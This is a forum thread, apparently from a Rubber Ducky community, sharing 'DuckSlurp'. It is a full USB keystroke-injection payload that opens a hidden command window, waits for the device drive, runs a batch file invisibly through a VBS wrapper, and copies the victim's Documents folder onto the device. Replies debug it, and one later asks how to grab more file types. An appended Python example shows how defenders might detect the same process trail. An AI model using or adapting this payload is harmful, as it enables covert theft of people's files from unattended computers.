overwraith Posted July 6, 2013 (edited)

For anyone who has heard about pod slurping, which is to say an iPod, this works exactly like that. Here is the website that I mostly based my work on: http://www.instructables.com/id/How-to-Pod-Slurp/?ALLSTEPS

Since the USB rubber ducky brings back autorun, it also brings back a form of pod slurping. To speed up this payload you could use a separate USB drive labeled "DUCKY" in a tandem ducky attack. Other USB drives mount instantly, and can be temporarily fused to the duck with a USB cable splitter. I have also been noticing that the Twin Duck firmware has been getting even faster in mounting the "DUCKY" drive, so the "RunEXE from SD" payload may soon become unnecessary.

The following is a modification of "RunEXE from SD":

REM Author: overwraith
REM Name: DuckSlurp.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
REM Remove the next two lines if you don't place your payloads in separate folders.
STRING set DUCKYdrive=%DUCKYdrive%\DuckSlurp\
ENTER
STRING START %DUCKYdrive%\DuckSlurp.bat
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

If you do not keep all your payload files in a separate folder on the ducky, and you do keep all files on the root, you will need to remove these lines:

REM Remove the next two lines if you don't place your payloads in separate folders.
STRING set DUCKYdrive=%DUCKYdrive%\DuckSlurp\
ENTER

In the batch file you will have to remove the small part that says "DuckSlurp" in the line:

set destination=%~d0\DuckSlurp\%COMPUTERNAME%

The following is the batch file which resides in the DuckSlurp folder:

REM File: DuckSlurp.bat
REM Purpose: a duck slurper payload, similar to pod slurping.
REM Original post: http://www.instructables.com/id/How-to-Pod-Slurp/?ALLSTEPS
@echo off
REM %0 path to the batch file
REM ~d is the drive
REM Located in DuckSlurp folder to separate from other payloads.
set destination=%~d0\DuckSlurp\%COMPUTERNAME%
echo %destination%
mkdir %destination%
REM Had to remove support for previous OSes because there is a
REM folder that is exactly the same on Windows 7, only access denied.
REM Windows Vista, and Windows 7
if Exist %USERPROFILE%\Documents (
xcopy %USERPROFILE%\Documents %destination%
)
@cls
@exit

This payload now works, and has been tested.

Edited July 10, 2013 by overwraith
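Seen from the defender's side, the payload in this post leaves a recognizable process-creation trail: a cmd.exe started with an unusual switch set, wscript.exe launching a batch file through a .vbs wrapper, diskpart run without a script file, and xcopy moving a user's Documents folder to another drive. The following is an added example, not part of the original post, that correlates those four traits over process command lines; the rule names, the assumption that C: is the system drive, the 300-second window, the three-rule threshold and the sample events are all constructed for illustration.

```python
import re
from collections import defaultdict

# Command-line traits of the payload in the post above. Rule names, the C: system
# drive, the 300 s window and the 3-rule threshold are assumptions of this example.
RULES = {
    "cmd_switches": re.compile(
        r"\bcmd(\.exe)?\"?\s+/Q\s+/D\s+/T:[0-9A-F]{2}\s+/F:OFF\s+/V:ON\s+/K", re.I),
    "wscript_vbs_runs_bat": re.compile(
        r"\bwscript(\.exe)?\"?\s+\S+\.vbs\"?\s+\S+\.bat\b", re.I),
    # diskpart with no /s script: commands are fed on stdin, as in DuckyWait.bat
    "diskpart_interactive": re.compile(
        r"^\"?(\S*\\)?diskpart(\.exe)?\"?\s*$", re.I),
    # Documents folder copied to any drive letter other than C:
    "xcopy_profile_off_drive": re.compile(
        r"\bxcopy(\.exe)?\"?\s+\"?C:\\Users\\[^\\\s]+\\Documents\"?\s+\"?(?!C:)[A-Z]:\\", re.I),
}
WINDOW_SECONDS = 300
MIN_DISTINCT_RULES = 3

def match_rules(cmdline):
    """Names of all rules whose pattern occurs in one process command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def correlate(events):
    """events: (epoch_seconds, host, cmdline) tuples from process-creation logs.
    Returns {host: rule names} where enough distinct rules fired in one window."""
    hits = defaultdict(list)
    for ts, host, cmdline in sorted(events):
        hits[host].extend((ts, rule) for rule in match_rules(cmdline))
    flagged = {}
    for host, seq in hits.items():
        for i, (start, _) in enumerate(seq):
            rules = {r for t, r in seq[i:] if t - start <= WINDOW_SECONDS}
            if len(rules) >= MIN_DISTINCT_RULES:
                flagged[host] = sorted(rules)
                break
    return flagged

# Constructed sample events (not real logs): WS-01 replays the payload's process
# sequence, WS-02 is routine admin activity that must not be flagged.
SAMPLE_EVENTS = [
    (1000, "WS-01", r"cmd /Q /D /T:7F /F:OFF /V:ON /K"),
    (1004, "WS-01", r"wscript.exe invis.vbs DuckyWait.bat"),
    (1005, "WS-01", r"diskpart"),
    (1040, "WS-01", r"xcopy C:\Users\alice\Documents E:\DuckSlurp\WS-01"),
    (2000, "WS-02", r"xcopy C:\Users\bob\Documents C:\Backup\bob"),
    (2010, "WS-02", r"diskpart /s C:\scripts\layout.txt"),
]
```

No single rule is treated as conclusive, since each of these commands also appears in ordinary administration; the correlation across several of them on one host in a short window is what narrows it down.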
mahorelee Posted July 10, 2013

Seems like a great Payload. I tested it out and I found out that this version of the Run.exe does not work for me. It brings up a window asking me yes or no if I want to allow diskpart to make changes. I plugged it into the other Run.exe code and everything ran fine. When the .bat is executed this is what happens.
overwraith (Author) Posted July 10, 2013

I'll have to find a larger USB drive and update this.
overwraith (Author) Posted July 10, 2013

It looks like I fixed the problem, recopy the code. I have edited my previous post.
mahorelee Posted July 11, 2013

Now it creates a folder with the computer's name but does not copy anything. Here is a screenshot of when the bat file is run by itself.
overwraith (Author) Posted July 11, 2013

Mine looks like it's working, just looks like it takes a long time to do anything. I have files moved onto my duck in their proper directory.
mahorelee Posted July 11, 2013

Huh, well I don't have the best luck with the Ducky so I'll just mess around with it. Nice post though!
ocean99 Posted January 8, 2023

Good day Sirs/Ma'ams, Hi, question: can we add copying of .txt, .pdf, .word, .exe files? Can we run multiple payloads in 1 single inject.bin file? What are the scripts to use to implement the multiple payloads? TIA Guys,
dark_pyrro Posted January 10, 2023

Digging up a 9+ year old post is quite an accomplishment. To copy specific file types, it's just to study basic copy operations and implement them as desired. Information on how to execute such copying is just a Google search away. It's not Ducky specific. It depends on the features available on the target. On the classic Ducky, only one (1) inject.bin can be used on each unique execution. However, it's possible to include several different operations in the same inject.bin. It all depends on what the goals are with the different stages of the payload/inject.bin.